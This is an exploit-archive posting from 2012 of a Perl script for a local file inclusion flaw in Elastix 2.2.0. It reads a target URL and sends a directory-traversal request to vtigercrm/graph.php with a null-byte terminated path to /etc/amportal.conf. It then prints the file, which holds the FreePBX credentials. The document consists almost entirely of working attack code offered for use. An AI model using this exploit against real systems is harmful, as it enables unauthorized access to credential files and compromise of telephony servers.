Home / exploits Elastix 2.2.0 Local File Inclusion
Posted on 17 August 2012
#!/usr/bin/perl -w #------------------------------------------------------------------------------------# #Elastix is an Open Source Sofware to establish Unified Communications. #About this concept, Elastix goal is to incorporate all the communication alternatives, #available at an enterprise level, into a unique solution. #------------------------------------------------------------------------------------# ############################################################ # Exploit Title: Elastix 2.2.0 LFI # Google Dork: :( # Author: cheki # Version:Elastix 2.2.0 # Tested on: multiple # CVE : notyet # romanc-_-eyes ;) # Discovered by romanc-_-eyes # vendor http://www.elastix.org/ print " Elastix 2.2.0 LFI Exploit "; print " code author cheki "; print " 0day Elastix 2.2.0 "; print " email: anonymous17hacker{}gmail.com "; #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action use LWP::UserAgent; print " Target: https://ip "; chomp(my $target=<STDIN>); $dir="vtigercrm"; $poc="current_language"; $etc="etc"; $jump="../../../../../../../..//"; $test="amportal.conf%00"; $code = LWP::UserAgent->new() or die "inicializacia brauzeris "; $code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action"; $res = $code->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ 'This file is part of FreePBX') { print " read amportal.conf file : $answer "; print " successful read "; } else { print " [-] not successful "; }
